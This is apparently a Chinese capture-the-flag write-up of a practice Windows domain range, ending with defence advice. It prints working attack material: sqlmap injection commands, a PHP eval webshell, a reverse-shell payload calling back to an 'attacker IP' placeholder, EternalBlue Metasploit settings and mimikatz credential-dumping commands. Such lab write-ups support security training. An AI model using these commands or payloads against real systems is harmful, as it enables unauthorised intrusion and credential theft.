记录一次坎坷的打靶经历·四

字数 1309 2025-08-11 08:36:26

Windows域渗透实战教学：从SQL注入到域控提权

1. 靶场环境概述

靶场平台：http://www.cloud-pentest.cn
目标系统：Windows域环境
网络拓扑：
- 172.25.0.123：织梦CMS系统
- 172.25.0.141：Windows 7系统（32位）
- 192.168.60.100：域控制器（DC）

2. 信息收集阶段

2.1 初始扫描

使用工具：fscan、nmap

# 快速扫描存活主机
fscan -h 172.25.0.0/24

# 详细端口扫描（针对无响应主机）
nmap -Pn -p- 172.25.0.141

关键发现：

172.25.0.141开放端口：445(SMB)、3389(RDP)
存在MS17-010（永恒之蓝）漏洞

2.2 Web应用信息收集

针对172.25.0.123的Web扫描：

gobuster dir -u http://172.25.0.123 -w /path/to/wordlist.txt

发现关键目录：

/sql/ - SQL执行页面
/dede/login.php - 后台管理登录

3. 漏洞利用过程

3.1 Flag2获取（SQL注入）

步骤：

发现SQL注入点：http://172.25.0.123/sql/id=2
使用sqlmap自动化利用：

sqlmap -u "http://172.25.0.123/sql/id=2" --dbs
sqlmap -u "http://172.25.0.123/sql/id=2" -D dedecmsv57 --tables
sqlmap -u "http://172.25.0.123/sql/id=2" -D dedecmsv57 -T flag --dump

3.2 Flag1获取（后台管理）

步骤：

通过SQL注入获取管理员凭据
登录后台/dede/login.php
在管理界面获取flag1

3.3 Flag3获取（文件上传+Webshell）

步骤：

在后台找到文件管理器
上传PHP webshell：

<?php @eval($_GET['cmd']); phpinfo();?>

反弹shell：

# 使用Burp Suite修改请求
cmd=system('php+-r+\'$sock%3dfsockopen("攻击者IP",1234)%3bsystem("sh+<%263+>%263+2>%263")%3b\'')%3b

3.4 Flag4获取（MS17-010利用）

环境准备：

# 安装32位兼容环境
sudo dpkg --add-architecture i386
apt-get update
apt-get install wine32

# 下载32位利用脚本
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

MSF利用：

use exploit/windows/smb/eternalblue_doublepulsar
set DOUBLEPULSARPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
set ETERNALBLUEPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
set PROCESSINJECT lsass.exe
set TARGETARCHITECTURE x64
set RHOSTS 172.25.0.141
run

问题解决：

中文乱码：执行chcp 65001
连接不稳定：尝试RDP连接

RDP连接：

使用SQL注入获取的凭据尝试连接
成功后在C盘找到flag4

3.5 Flag5获取（域渗透）

信息收集：

ipconfig /all
# 发现域信息：test域
# 发现域控IP：192.168.60.100

使用mimikatz获取凭据：

privilege::debug
sekurlsa::logonpasswords full

域控攻击：

获取域管理员凭据
通过RDP连接域控（192.168.60.100）
在域控C盘找到flag5

4. 关键知识点总结

4.1 信息收集技巧

对于不响应ICMP的主机使用-Pn参数
完整端口扫描的重要性
Web目录爆破的常用工具和字典

4.2 漏洞利用要点

SQL注入：

自动化工具sqlmap的高级用法
数据库结构分析技巧
从注入到后台的完整链条

MS17-010利用：

32位环境兼容性问题解决
利用脚本的配置要点
会话不稳定的应对策略

域渗透技术：

mimikatz的基本使用：
- 权限提升
- 凭据导出
域内横向移动：
- 使用获取的域凭据
- 多跳RDP连接

5. 防御建议

针对SQL注入：
- 使用参数化查询
- 最小化数据库权限
- 定期更新CMS系统
针对MS17-010：
- 及时安装安全补丁
- 关闭不必要的SMB服务
- 使用网络分段限制445端口访问
针对域安全：
- 实施强密码策略
- 限制域管理员账户的使用
- 启用Windows Defender Credential Guard
- 监控异常登录行为

6. 扩展学习资源

永恒之蓝漏洞原理分析
Windows域环境安全架构
横向移动技术大全
特权账户管理最佳实践

通过本案例的系统学习，可以掌握从Web渗透到域环境提权的完整攻击链，以及相应的防御策略。

Windows域渗透实战教学：从SQL注入到域控提权 1. 靶场环境概述靶场平台：http://www.cloud-pentest.cn 目标系统：Windows域环境网络拓扑： 172.25.0.123：织梦CMS系统 172.25.0.141：Windows 7系统（32位） 192.168.60.100：域控制器（DC） 2. 信息收集阶段 2.1 初始扫描使用工具：fscan、nmap 关键发现： 172.25.0.141开放端口：445(SMB)、3389(RDP) 存在MS17-010（永恒之蓝）漏洞 2.2 Web应用信息收集针对172.25.0.123的Web扫描：发现关键目录： /sql/ - SQL执行页面 /dede/login.php - 后台管理登录 3. 漏洞利用过程 3.1 Flag2获取（SQL注入）步骤：发现SQL注入点： http://172.25.0.123/sql/id=2 使用sqlmap自动化利用： 3.2 Flag1获取（后台管理）步骤：通过SQL注入获取管理员凭据登录后台 /dede/login.php 在管理界面获取flag1 3.3 Flag3获取（文件上传+Webshell）步骤：在后台找到文件管理器上传PHP webshell：反弹shell：在网站根目录找到flag3 3.4 Flag4获取（MS17-010利用）环境准备： MSF利用：问题解决：中文乱码：执行 chcp 65001 连接不稳定：尝试RDP连接 RDP连接：使用SQL注入获取的凭据尝试连接成功后在C盘找到flag4 3.5 Flag5获取（域渗透）信息收集：使用mimikatz获取凭据：域控攻击：获取域管理员凭据通过RDP连接域控（192.168.60.100）在域控C盘找到flag5 4. 关键知识点总结 4.1 信息收集技巧对于不响应ICMP的主机使用 -Pn 参数完整端口扫描的重要性 Web目录爆破的常用工具和字典 4.2 漏洞利用要点 SQL注入：自动化工具sqlmap的高级用法数据库结构分析技巧从注入到后台的完整链条 MS17-010利用： 32位环境兼容性问题解决利用脚本的配置要点会话不稳定的应对策略域渗透技术： mimikatz的基本使用：权限提升凭据导出域内横向移动：使用获取的域凭据多跳RDP连接 5. 防御建议针对SQL注入：使用参数化查询最小化数据库权限定期更新CMS系统针对MS17-010 ：及时安装安全补丁关闭不必要的SMB服务使用网络分段限制445端口访问针对域安全：实施强密码策略限制域管理员账户的使用启用Windows Defender Credential Guard 监控异常登录行为 6. 扩展学习资源永恒之蓝漏洞原理分析 Windows域环境安全架构横向移动技术大全特权账户管理最佳实践通过本案例的系统学习，可以掌握从Web渗透到域环境提权的完整攻击链，以及相应的防御策略。